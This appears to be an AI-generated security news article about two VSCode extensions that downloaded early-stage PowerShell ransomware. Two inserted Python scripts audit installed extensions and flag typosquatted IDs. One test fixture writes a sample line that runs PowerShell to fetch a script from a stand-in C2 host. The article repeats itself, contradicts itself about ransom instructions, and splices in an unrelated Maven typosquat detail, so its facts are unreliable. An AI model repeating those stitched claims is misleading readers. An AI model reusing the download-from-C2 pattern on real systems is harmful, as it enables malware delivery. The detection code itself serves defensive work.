Ethical Hacking News
Malicious code found in Visual Studio Code extensions, targeting users with ransomware attacks. Two extensions, "ahban.shiba" and "ahban.cychelloworld," have been taken down by marketplace maintainers after being discovered. The extensions use typosquatting to trick developers into adding the malicious package, increasing their chances of being used in legitimate projects.
The payload is suspected to be ransomware in early-stage development, only encrypting files in a folder called "testShiba" on the victim's Windows desktop. Upon encryption, the PowerShell payload displays a message stating that the user's files have been encrypted and provides instructions for payment in order to recover them.
No cryptocurrency wallet addresses are provided to the victims. This lack of information suggests that the malware is likely still under development by the threat actors rather than a fully formed attack tool. The incident highlights the ongoing challenge faced by cybersecurity professionals in maintaining the integrity and security of widely used platforms.
To stay ahead of emerging threats like these, users must remain informed about new vulnerabilities and adopt proactive measures to protect against them. This includes verifying the authenticity of any new additions to their systems before installing them and staying vigilant when using publicly available software.
Two malicious extensions in Visual Studio Code (VSCode) Marketplace were found to deploy ransomware. The extensions, "ahban.shiba" and "ahban.cychelloworld", have been taken down by the marketplace maintainers. The malware uses PowerShell commands to download a ransomware payload from a C2 server and executes it on the victim's Windows desktop. No cryptocurrency wallet addresses or instructions are provided to the victims, suggesting the malware is under development. Typosquatting was used by attackers to trick developers into adding the malicious package, making it harder to detect. The incident highlights the need for ongoing vigilance and cooperation among developers, security researchers, and platform maintainers to ensure secure software supply chains.
The world of cybersecurity is ever-evolving, with new threats and vulnerabilities emerging on a daily basis. Recently, a disturbing trend has come to light that highlights the danger posed by malicious code, specifically two extensions in the Visual Studio Code (VSCode) Marketplace that are designed to deploy ransomware.
According to ReversingLabs, the two extensions, "ahban.shiba" and "ahban.cychelloworld," have been taken down by the marketplace maintainers after being discovered. This did not happen, however, before they had already caused significant concern among cybersecurity researchers and experts.
The extensions in question incorporate code that invokes a PowerShell command, which then grabs a PowerShell-script payload from a command-and-control (C2) server and executes it. The payload is suspected to be ransomware in early-stage development, only encrypting files in a folder called "testShiba" on the victim's Windows desktop. Upon encryption, the PowerShell payload displays a message stating that the user's files have been encrypted and provides instructions for payment in order to recover them.
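The behaviour described above (an extension's activation code shelling out to PowerShell, which fetches a script from a remote server) leaves recognisable traces in the extension's JavaScript. The following audit script is an added example, not code from the article or from ReversingLabs: it walks an extensions root such as `~/.vscode/extensions`, resolves each extension's activation script from the `main` field of its `package.json`, and flags any extension whose script pairs a PowerShell invocation with a download or process-spawn indicator. The indicator regexes and the two sample extensions it builds in a temporary directory are constructed for the example and are assumptions, not artefacts of the real "ahban" packages.

```python
"""Audit a VS Code extensions directory for download-and-execute indicators.

Added example, not code from the article or from ReversingLabs. Indicator
patterns and the sample fixture are assumptions constructed for illustration.
"""
import json
import re
import tempfile
from pathlib import Path

# Indicator patterns (assumed; extend to taste).
INDICATORS = {
    "powershell": re.compile(r"powershell(\.exe)?|pwsh(\.exe)?", re.IGNORECASE),
    "download": re.compile(
        r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient",
        re.IGNORECASE,
    ),
    "spawn": re.compile(r"child_process|\bexec(Sync)?\(|\bspawn(Sync)?\("),
    "encoded": re.compile(r"-EncodedCommand|-enc\b|FromBase64String", re.IGNORECASE),
    "hidden": re.compile(r"-WindowStyle\s+Hidden|-NonInteractive", re.IGNORECASE),
}


def activation_script(ext_dir: Path):
    """Return the script that package.json names in 'main', or None."""
    manifest = ext_dir / "package.json"
    try:
        meta = json.loads(manifest.read_text(encoding="utf-8"))
    except (OSError, ValueError):
        return None
    main = meta.get("main")
    if not isinstance(main, str):
        return None
    script = (ext_dir / main).resolve()
    # Ignore a 'main' that points outside the extension directory.
    if ext_dir.resolve() not in script.parents or not script.is_file():
        return None
    return script


def scan_source(path: Path):
    """Return the sorted list of indicator names present in a source file."""
    try:
        text = path.read_text(encoding="utf-8", errors="replace")
    except OSError:
        return []
    return sorted(name for name, pat in INDICATORS.items() if pat.search(text))


def audit_extensions(root) -> dict:
    """Map extension directory name -> indicator list for flagged extensions.

    An extension is flagged when its activation script contains a PowerShell
    invocation together with a download or process-spawn indicator.
    """
    findings = {}
    for ext_dir in sorted(p for p in Path(root).iterdir() if p.is_dir()):
        script = activation_script(ext_dir)
        if script is None:
            continue
        hits = scan_source(script)
        if "powershell" in hits and ({"download", "spawn"} & set(hits)):
            findings[ext_dir.name] = hits
    return findings


def build_sample_root() -> Path:
    """Create a temporary extensions root with one benign and one suspicious extension.

    Both extensions are constructed for this example; neither is a real
    marketplace package, and the URL uses the reserved .invalid TLD.
    """
    root = Path(tempfile.mkdtemp(prefix="vscode-ext-audit-"))

    benign = root / "example.hello-1.0.0"
    benign.mkdir()
    (benign / "package.json").write_text(json.dumps(
        {"name": "hello", "publisher": "example", "main": "./extension.js"}))
    (benign / "extension.js").write_text(
        'const vscode = require("vscode");\n'
        'exports.activate = () => vscode.window.showInformationMessage("hello");\n')

    suspicious = root / "examp1e.hello-0.0.1"
    suspicious.mkdir()
    (suspicious / "package.json").write_text(json.dumps(
        {"name": "hello", "publisher": "examp1e", "main": "./extension.js"}))
    (suspicious / "extension.js").write_text(
        'const { exec } = require("child_process");\n'
        '// constructed indicator line: fetch a script over HTTP via PowerShell\n'
        "exports.activate = () => exec('powershell -NonInteractive -Command "
        '"Invoke-WebRequest -Uri http://c2.invalid/stage.ps1"\');\n')
    return root


if __name__ == "__main__":
    sample = build_sample_root()
    for name, hits in audit_extensions(sample).items():
        print(f"FLAGGED {name}: {', '.join(hits)}")
```

Run it against a real profile with `audit_extensions(Path.home() / ".vscode" / "extensions")`; a hit is a reason to read the extension's source, not proof of malice, since legitimate tooling extensions also spawn shells.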
However, it is worth noting that no other instructions or cryptocurrency wallet addresses are provided to the victims. This lack of information suggests that the malware is likely under development by the threat actors, as opposed to being a fully formed attack tool. The fact that malicious code masquerading as legitimate software has made its way into widely-used platforms highlights the ongoing challenge faced by cybersecurity professionals in maintaining the integrity and security of these systems.
The situation also raises questions about the role of typosquatting in malware distribution. In this case, attackers used nearly identical names to trick developers into adding the malicious package. The fact that all six dependent packages share the same groupId (io.github.leetcrunch) instead of the real namespace (com.github.scribejava) further emphasizes the use of typosquatting as a tactic. This approach boosts the perceived legitimacy of the malicious library, increasing the chances of it being downloaded and used in legitimate projects.
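Typosquatted identifiers are cheap to catch before installation when an organisation keeps an allowlist of approved extensions. The check below is an added example, not the article's or the marketplace's code: it treats a marketplace extension ID as `publisher.name`, folds common look-alike characters (`0`/`o`, `1`/`l`, `rn`/`m`, dropped hyphens), and measures edit distance on the publisher and name parts separately, so that an ID close to, but not equal to, an allowlisted one is flagged. The allowlist entries, the confusable table and the distance thresholds are assumptions for the example.

```python
"""Flag VS Code extension IDs that look like typosquats of an allowlist.

Added example, not code from the article. Allowlist, confusable table and
thresholds are assumptions chosen for illustration.
"""

# Constructed allowlist of extension IDs an organisation has approved.
TRUSTED_IDS = {
    "ms-python.python",
    "esbenp.prettier-vscode",
    "dbaeumer.vscode-eslint",
}

# Look-alike substitutions folded before comparison (assumed list).
CONFUSABLES = [("rn", "m"), ("0", "o"), ("1", "l"), ("3", "e"),
               ("5", "s"), ("-", ""), ("_", "")]


def fold(s: str) -> str:
    """Lower-case and collapse confusable spellings so 'ms-pyth0n' == 'mspython'."""
    s = s.lower()
    for src, dst in CONFUSABLES:
        s = s.replace(src, dst)
    return s


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_extension_id(candidate: str, trusted=TRUSTED_IDS,
                       max_publisher_dist: int = 2, max_name_dist: int = 1):
    """Return (verdict, closest_trusted_id, detail).

    verdict is 'trusted' for an exact allowlist hit, 'suspicious' when the ID
    is within the thresholds of an allowlisted ID (or reuses an allowlisted
    extension name under a different publisher) but is not that ID, and
    'unknown' otherwise.
    """
    if candidate in trusted:
        return ("trusted", candidate, "exact allowlist match")
    if "." not in candidate:
        return ("unknown", None, "not a publisher.name identifier")
    pub, name = candidate.split(".", 1)
    best = None
    for tid in trusted:
        tpub, tname = tid.split(".", 1)
        dpub = levenshtein(fold(pub), fold(tpub))
        dname = levenshtein(fold(name), fold(tname))
        close = dpub <= max_publisher_dist and dname <= max_name_dist
        if close or dname == 0:
            score = dpub + dname
            if best is None or score < best[0]:
                best = (score, tid, dpub, dname)
    if best is None:
        return ("unknown", None, "no allowlisted ID within threshold")
    _, tid, dpub, dname = best
    return ("suspicious", tid,
            f"publisher distance {dpub}, name distance {dname} from {tid}")


if __name__ == "__main__":
    # Constructed candidates; none is a real marketplace listing.
    for cand in ["ms-python.python", "ms-pyth0n.python",
                 "dbaeurner.vscode-eslint", "somepub.python", "acme.unrelated"]:
        print(cand, "->", check_extension_id(cand))
```

Wire this into the step that approves a new extension for a developer image: `trusted` installs, `unknown` goes to manual review, `suspicious` is rejected and logged with the allowlisted ID it imitates.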
This incident is just one example of the many challenges faced by cybersecurity professionals in identifying and addressing new vulnerabilities. It highlights the need for ongoing vigilance and cooperation among developers, security researchers, and platform maintainers to ensure that software supply chains are secure and trustworthy.
Furthermore, this case underscores the importance of staying informed about emerging threats and adopting proactive measures to protect against them. Users must remain vigilant when using publicly available software and always verify the authenticity of any new additions to their systems before installing them.
In conclusion, the discovery of these two malicious extensions in the VSCode Marketplace serves as a stark reminder of the dangers posed by malicious code and the need for constant vigilance among users and security professionals alike. It is only through continued awareness and proactive measures that we can hope to mitigate the risks associated with such threats.
Related Information:
https://www.ethicalhackingnews.com/articles/The-Looming-Shadow-of-Malicious-Code-A-Threat-to-Visual-Studio-Code-Users-ehn.shtml
https://thehackernews.com/2025/03/vscode-marketplace-removes-two.html
https://www.bleepingcomputer.com/news/security/vscode-extensions-found-downloading-early-stage-ransomware/
https://www.securitynewspaper.com/2025/03/21/microsofts-store-let-ransomware-slip-through-is-your-vscode-editor-safe/
Published: Mon Mar 24 07:38:37 2025 by llama3.2 3B Q4_K_M